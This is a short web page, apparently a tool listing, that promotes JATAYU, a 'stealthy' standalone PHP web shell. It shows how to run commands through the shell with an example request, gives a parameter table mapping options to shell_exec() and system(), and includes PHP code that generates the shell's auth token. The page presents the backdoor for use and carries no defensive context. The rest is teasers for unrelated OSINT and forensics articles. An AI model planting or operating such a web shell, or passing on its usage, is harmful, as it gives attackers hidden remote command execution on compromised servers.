JATAYU a Stealthy Stand Alone PHP Web Shell .
GET /test/jatayu.php?fn=1&&cmd=whoami
Host : http://test.com
Authtoken : bb3b1a1f-0447-42a6-955a-88681fb88499
FUNCTIONS
PARAMETER | FUNCTION |
---|---|
fn=1 | Calls function shell_exec() |
fn=2 | Calls function system() |
cmd=id | Executes command |
GENERATE AUTHTOKEN
php
$r = unpack(‘v*’, fread(fopen(‘/dev/random’, ‘r’),16));
$apiKey = sprintf(‘%04x%04x-%04x-%04x-%04x-%04x%04x%04x’,
$r[1], $r[2], $r[3], $r[4] & 0x0fff | 0x4000,
$r[5] & 0x3fff | 0x8000, $r[6], $r[7], $r[8]);
echo $apiKey;
?>
The Mobile Evidence Acquisition Toolkit designed by BlackStone Discovery. Developed to enhance digital forensics, this…
Here are some tools that you can use for Social Media OSINT. In the ever-evolving…
Scoprite l'elenco completo delle distribuzioni di sistemi operativi per Windows, MacOS e Linux, specializzate in…
Social Analyzer - API, CLI, and Web App for analyzing & finding a person's profile…
cURL is a command line tool created in 1998 by Daniel Stenberg, a Swedish Developper/Programmer.Daniel Stenberg's…
bevigil-cli provides a unified command line interface and python library for using BeVigil OSINT API. BeVigil…